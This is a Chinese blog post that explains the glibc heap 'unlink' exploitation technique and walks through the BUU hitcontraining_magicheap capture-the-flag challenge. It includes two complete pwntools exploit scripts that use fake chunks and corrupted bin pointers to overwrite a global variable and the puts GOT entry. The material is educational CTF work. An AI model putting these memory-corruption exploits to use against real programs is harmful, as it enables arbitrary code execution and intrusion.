Unlink

已于 2024-01-18 22:26:59 修改
阅读量932 收藏 17
点赞数 18
文章标签: 网络安全 python linux
于 2024-01-18 22:25:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pdxbshx/article/details/135678203
版权

0x00 原理

unlink,简称脱链,就是直接将链表头处的free堆块unsorted bin中脱离出来,然后和物理地址相邻的新free的堆块合并成大堆块(向前或向后合并),再放入到unsorted bin中。

危害原理:通过伪造的free状态的fake_chunk,伪造fd指针和bk指针,通过绕过unlink的检测来实现unlink,unlink就会往p所在的位置写入p-0x18,从而实现任意地址写的漏洞。

漏洞产生的原因:offbynull、offbyone、堆溢出、修改了堆块的使用标志位

/*malloc.c int_free函数中*/

/*这里p指向当前malloc_chunk结构体*/

if(!prev_inuse(p)){
    prevsize = p->prev_size;
    size += prevsize;
    //修改指向当前chunk的指针,指向前一个chunk
    p = chunk_at_offset(p,-((long)prevsize));
    unlink(p,bck,fwd);
}

/*unlink操作的实质是:将p所指向的chunk从双向链表中移除,这里BK和FD用作临时变量*/
define unlink(P,BK,FD){
	FD = P->fd;
	BK = P->bk;
	if(__builtin_expect(FD->bk!=P || BK->fd!=P,0))
        malloc_printerr(check_action,"corrupted double-linked list",P,AV);
	FD->bk = BK;
	BK->fd = FD;
	...
}

0x01 绕过和利用

1、伪造如下:
chunk = 0x0602280(P是将要合并到的堆地址,P存在于chunk中,相当于*chunk=P)
P_fd = chunk-0x18 = 0x602268
P_bk = chunk-0x10 = 0x602270

2、绕过技巧
define unlink(P,BK,FD){
	FD = P->fd;  \\FD = 0x602268
	BK = P->bk;  \\BK = 0x602270
	if(__builtin_expect(FD->bk!=P || BK->fd!=P,0)) 
        \\FD->bk = *(0x602268+0x18)|*(0x602280) = P
        \\BK->fd = *(0x602270+0x10)|*(0x602280) = P,绕过!
        malloc_printerr(check_action,"corrupted double-linked list",P,AV);
	FD->bk = BK;  \\ *(0x602268+0x18)|*(0x602280) = 0x602270
	BK->fd = FD;  \\ *(0x602270+0x10)|*(0x602280) = 0x602268
	...
}
最终效果就是往chunk里面写入了chunk-0x18的值。
利用方法:首先edit堆的时候,将chunk的值修改为puts函数地址;第二次edit的时候,
由于chunk的值已经修改为puts函数的地址,那么我们再对chunk进行修改就相当于对puts函数
对应的地址进行修改,后面会有例题。

0x02 实战

题目来源:BUU hitcontraining_magicheap

首先放入ida中,进行反编译,得到一个典型的菜单题:

main():

create_heap:

edit_heap():

delete_heap():

l33t():

1、Method 1

由main函数可知,要使程序运行l33t函数,那么我就需要保证输入的值为4869,并且magic的值要大于0x1305,第一种办法就是修改magic的值,我们首先创建三个堆块,然后释放chunk1,同时chunk的堆块大小为0x91(包括prev_size+size),这样它可以加入到unsorted bin中,另外我们再通过edit chunk0来修改chunk1的bk指针为magic-0x10,从而使得我们再次申请chunk的时候,会分配给我们magic的地址,接着对chunk1进行edit即可修改magic的值,脚本如下所示:

from pwn import *
context.log_level = "debug"
p = process("1")
#p = remote("node5.buuoj.cn",29812)
def create_heap(size,content):
    p.recvuntil(b"choice :")
    p.send(b"1")
    p.recvuntil(b"Heap : ")
    p.send(str(size))
    p.recvuntil(b"heap:")
    p.send(content)

def edit_heap(index,size,content):
    p.recvuntil(b"choice :")
    p.send(b"2")
    p.recvuntil(b"Index :")
    p.send(str(index))
    p.recvuntil(b"Heap : ")
    p.send(str(size))
    p.recvuntil(b"heap : ")
    p.send(content)

def delete_heap(index):
    p.recvuntil(b"choice :")
    p.send(b"3")
    p.recvuntil(b"Index :")
    p.send(str(index))

magic_addr = 0x06020a0
create_heap(0x20,"aaaa")
create_heap(0x80,"bbbb")
create_heap(0x20,"cccc")
delete_heap(1)
edit_heap(0,0x40,b"a"*0x20+p64(0)+p64(0x91)+p64(0)+p64(magic_addr-0x10))
create_heap(0x80,"aaaa")
p.recvuntil(b"choice :")
p.sendline(b"4869")
#gdb.attach(p)
#pause()
p.interactive()

在本地打通结果如下:

2、Method 2

第二种方法使用unlink的知识来解决,我们首先通过ida得到heaparray的地址,即存放chunk的首地址,也为chunk0的地址,接下来申请三个堆块,并伪造一个chunk,我们将heaparray_addr-0x18和heaparray_addr-0x10写入fakechunk的fd和bk指针,同时将chunk1的prevsize修改为0x90,size修改为0xa0,表示前面一个堆块的大小为0x90,并且没有被使用,那么我们在delete chunk1的时候,会将fakechunk和chunk1进行合并,然后进行unlink,我接下来通过图片来进行详细说明,注意每次断点截图的地址不一样,但效果是一样的: 

在delete chunk1之前,我们的堆块如下所示:

接着查看heaparray的值:

此时,heaparray地址对应的值还没被修改为heaparray-0x18的地址,接着delete之后,得到的chunk分布如下所示:

ok,因为heaparray里面存放的是chunk的地址,那么我们接下来对chunk0进行edit,是不是就相当于对heaparray-0x18这个地址的值进行修改,那么我们是不是就可以覆盖到chunk0的地址,所以第一次进行edit的时候,就是要将chunk0的地址修改为puts函数的地址,payload1= p64(0)*3+p64(puts_got),然后第二次进行edit chunk0的时候,就相当于对puts_got表的地址进行修改,payload2=p64(l33t_addr),截图如下:

puts_got表地址已被修改为l33t函数的地址。

脚本如下所示:

from pwn import *
p = process("./1")
context.log_level = "debug"
elf = ELF("./1")
gdb.attach(p)
def create_heap(size,content):
    p.recvuntil(b"choice :")
    p.send(b"1")
    p.recvuntil(b"Heap : ")
    p.send(str(size))
    p.recvuntil(b"heap:")
    p.send(content)

def edit_heap(index,size,content):
    p.recvuntil(b"choice :")
    p.send(b"2")
    p.recvuntil(b"Index :")
    p.send(str(index))
    p.recvuntil(b"Heap : ")
    p.send(str(size))
    p.recvuntil(b"heap : ")
    p.send(content)

def delete_heap(index):
    p.recvuntil(b"choice :")
    p.send(b"3")
    p.recvuntil(b"Index :")
    p.send(str(index))

l33t_addr = 0x400c50
puts_got = elf.got["puts"]
heaparray_addr = 0x06020C0
create_heap(0x90,"aaaa")
create_heap(0x90,"bbbb")
create_heap(0x20,"cccc")
fakechunk = p64(0)+p64(0x91)+p64(heaparray_addr-0x18)+p64(heaparray_addr-0x10)
fakechunk = fakechunk.ljust(0x90,b"a")
fakechunk += p64(0x90)+p64(0xa0)
edit_heap(0,0xa0,fakechunk)
#pause()
delete_heap(1)
#pause()
edit_heap(0,0x20,p64(0)*3+p64(puts_got))
edit_heap(0,0x8,p64(l33t_addr))
#pause()
#delete_heap(0)
p.interactive()

pdxbshx
关注
  • 18
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
unlink
m0_64195960的博客
06-07 214
1)定义:在双向链表中取出一个chunk的操作2)使用时间:1、malloc·在恰好大小的large chunk处取chunk时·在比请求大小大的bin中取chunk时2、Free·后向合并,合并物理相邻低物理地址空闲chunk时·前向合并,合并物理相邻高物理地空闲chunk时(top chunk除外)3、malloc_consolidate·后向合并,合并物理相邻低地址空闲chunk时·前向合并,合并物理相邻高地址空闲chunk时(top chunk除外)4、realloc前向扩展,合并物理相邻高地址空闲
c语言 unlink,unlink 漏洞笔记
weixin_39806948的博客
05-24 668
前导知识malloc_chunk 结构struct malloc_chunk {INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */struct malloc_...
redis unlink
weixin_43887958的博客
08-19 3246
unlink是指redis用异步方式去del键值,但是异步删除键值有一个判断条件. 会根据元素的个数来判断是否值得用异步线程去del,因为异步会有额外的消耗,如果元素较少(比如string,无论string多大都是在主线程里删除),直接在主线程里删除就行. List:直接返回element个数。 Set:非hash table编码,即intset编码时返回1.当一个集合只包含整数值元素, 并且这个集合的元素数量不多时, Redis 就会使用intset作为集合键的底层实现。 Hash:同上。 当hash键值
好好说话之unlink
hollk’s blog
09-17 5203
堆溢出的第三部分unlink,这可能是有史以来我做的讲解图最多的一篇文章了~~累死~~ 。可能做pwn的人都应该听过unlink,见面都要说声久仰久仰。学unlink的时候走了一些弯路,也是遇到了很多困扰的问题,会在后面的内容中做出标注。由于写的比较详细,所以字数依然还是一如既往的多,我会在适当的时候提醒向前回顾某一处知识点,也希望在看例题的时候能够跟着一起做一下 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
unlink学习
weixin_45427676的博客
04-14 533
unlink原理 unlink这种利用方式源于glibc堆管理的一种特性,即当free一个chunk时,若该chunk处于双向链表中,则会检测其相邻块是否空闲,若处于空闲状态,则会将该空闲块从双向链表中取出,然后合并,这个取出操作就是unlink。unlink其实就是删除双向链表中的目标结点,这个删除过程本质上是对其前后结点的指针重新赋值,若我们对其指针进行巧妙的设置,则可能控制任意内存地址空间,...
unlink快速入门
abelxu
11-12 3095
0x01 正常unlink 当一个bin从记录bin的双向链表中被取下时,会触发unlink。常见的比如:相邻空闲bin进行合并,malloc_consolidate时。unlink的过程如下图所示(来自CTFWIKI)主要包含3个步骤,就是这么简单。 根据p的fd和bk获得双向链表的上一个chunk FD和下一个chunk BK 设置FD->bk=BK 设置BK->fd=FD 下面看一下unlink的源码。 #安装源码 apt install glibc-source #下面目录下有一个
unlink 入门
qq_42220888的博客
08-03 250
关于ctf pwn unlink学习
堆溢出-unlink
yms0211的博客
03-18 851
#有几张图出自hollk师傅的文章,原文链接:https://blog.csdn.net/qq_41202237/article/details/108481889# 堆溢出-unlink 对unlink的利用大概就是对chunk进行内存布局,然后借助unlink中对指针的操作来修改chunk中的指针 unlink的宏定义: #define unlink(AV, P, BK, FD) { FD = P->f
unlink 函数的作用
喜欢车的程序猿
06-18 152
运行一个程序时有时需要创建一些临时文件,如果进程运行过程中突然终止了,而临时文件还没来的及删除,那么就会遗留下很多没用的临时文件。unlink提供了解决这个问题的一种方法。创建一个临时文件后立刻调用unlink删除文件。但是进程还是打开该文件的,所以该临时文件内容依旧是能被访问的。但是进程终止后,该文件内容就会被删除。当关闭一个文件时,内核首先检查打开该文件的进程,如果该数为0,然后检查其链接数,如果该数也是0,那么就删除该文件内容。
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@...
php中unlink()、mkdir()、rmdir()等方法的使用介绍
10-27
`unlink()`, `mkdir()`, 和 `rmdir()` 是三个关键的函数,用于处理文件和目录的操作。下面将详细介绍这三个函数的用法和注意事项。 1. **unlink() 函数**: `unlink()` 用于删除指定的文件。其基本语法是 `unlink...
堆漏洞之unlink1
08-04
《深入理解堆漏洞:以unlink1为例》 堆漏洞是一种常见的软件安全问题,尤其是在C语言编程中,由于程序员对内存管理不当,可能导致严重的安全风险。本文将深入探讨一种名为"unlink1"的堆漏洞利用技巧,以及其在特定...
给项目添加依赖:报错operation not permitted, unlink.原来是4048
01-20
syscall unlink npm ERR! path D:\Users\Megan\企业微信下载地址\WXWork\1688850487518406\Cache\File\2020-02\cmall-back1\node_modules\.staging\echarts-2100c70a\dist\echarts.js npm ERR! errno -4048 npm ERR...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8294
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
htb_Blurry
weixin_62621015的博客
06-13 734
hack the box linux
GLM+vLLM 部署调用
最新发布
qq_38915354的博客
06-13 1229
vLLM 框架是一个高效的大型语言模型(LLM)推理和部署服务系统
找出Python潜在的编程问题
svygh123的专栏
06-13 1090
Pylint 是一个非常强大的静态代码分析工具,主要用于检查 Python 代码的语法错误、代码风格问题以及潜在的编程错误。它是 Open Source Initiative 认证的开源软件,由 Logilab 团队开发维护。
unlink pwn
08-25
在计算机安全领域,"unlink"是一种常见的堆溢出攻击利用技术。它利用了"Use-After-Free"漏洞,该漏洞在释放内存后仍然使用该内存的指针。 在具体的实现中,"unlink"攻击需要使用全局变量,并进行多次写入。攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值